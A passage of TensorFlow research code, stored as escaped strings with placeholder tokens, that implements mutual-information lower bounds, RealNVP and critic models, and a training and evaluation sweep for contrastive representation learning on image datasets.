data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = 